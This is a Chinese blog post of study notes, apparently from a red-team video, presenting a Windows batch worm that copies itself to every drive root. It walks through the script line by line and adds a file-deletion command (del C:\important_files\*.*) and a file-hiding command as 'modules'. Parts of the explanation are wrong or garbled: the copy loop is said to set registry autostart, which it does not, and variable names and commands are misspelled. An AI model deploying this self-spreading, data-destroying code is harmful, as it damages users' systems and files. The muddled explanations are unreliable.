声明
学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章笔记的只是方便各位师傅学习知识,以下网站涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负
一、源码
@echo off
setlocal enabledelayedexpansion
:: 设置蠕虫文件的名称
set WORM_FILE=worm.bat
:: 检查当前文件是否是蠕虫文件
if not "%~nx0"=="%WORM_FILE%" (
echo This is not the worm file.
goto end
)
:: 显示蠕虫启动消息
echo Starting the worm simulation...
:: 循环复制自身到其他目录
for %%d in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%d: (
if not exist %%d:\%WORM_FILE% (
copy "%~f0" "%%d:\%WORM_FILE%"
echo Copied worm to %%d:\
)
)
)
:: 结束蠕虫模拟
:end
echo Worm simulation ended.
endlocal
二、语句含义
一、第一部分
@echo off
该语法是为了更好便于bat批处理命令的执行,由于Windows批处理脚本(bat文件)时,默认会每执行一条命令命令本身和执行结果都会回显在命令提示符窗口中。
故,@echo off作用是关闭执行命令回显功能,在批处理脚本开头加上这句后,脚本执行命令将不会回显,如果有输出的话只会回显命令执行结果。
setloacl enabledelayedexpansion
setlocal 用于设置局部环境的命令。可以限制变量的作用范围,使其在它之后的定义变量在该局部环境内有效,并将该局部环境结束。通常在脚本末尾或遇到对应命令endlocal,这些遍历会自动清除。(局部环境不会影响到全局环境)
setloacl enabledelayedexpansion 的是setlocal命令的扩展,变量的默认扩展方式是在读取命令时就进行扩展。但是在一些特殊情境下,如需要循环体内根据循环的进展动态地更新变量的值并使用这些更新后的值,常规的变量扩展就会出现问题,所以启动延迟扩展,变量的扩展就会延迟到实际需要使用该变量的值时进行,这样就能在循环等动态下灵活的处理变量的值。在开启延迟环境变量扩展后,在代码中使用的变量需要用!,而不是%引用。
二、第二部分
set WORM_FILE=worm.bat
set用于Windows批处理脚本中设置变量的命令,通过该命令可创建新的变量或修改已有变量值
WORM_FILE 就是新定义的变量名,后续脚本内容来代表worm.bat文件。
三、第三部分
%~nx0
%~nx0 来获取当前脚本文件的文件名和扩展名。%0表示当前脚本文件名(包括路径),~n用于提取文件名部分,~x用于提取扩展名部分,将其组合~nx就能获取文件名和扩展名。
四、第四部分
if条件语句
if not "!%~nx0!" == "!WROM_FILE!" (
start cmd
)
for语句
自我复制模块:
for %%d in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%d: (
if not exist %%d:\%WORM_FILE% (
copy "%~f0" "%%d:\%WORM_FILE%"
echo Copied worm to %%d:\
)
)
)该语句会利用reg注册表将蠕虫添加到自启动任务中。
恶意目的模块:del C:\important_files\*.*
利用del对目标文件进行删除破坏。
隐藏痕迹模块:attrib +h C:\destination_folder\worm.bat
修改蠕虫文件属性。
最后,制作不易,您的点赞是对我最大的支持,感谢大家点赞关注一键三连,未来我还会更新更多红队文章
标签:变量,%%,--,WORM,echo,渗透,蠕虫,worm From: https://blog.csdn.net/Zeu_s/article/details/143651290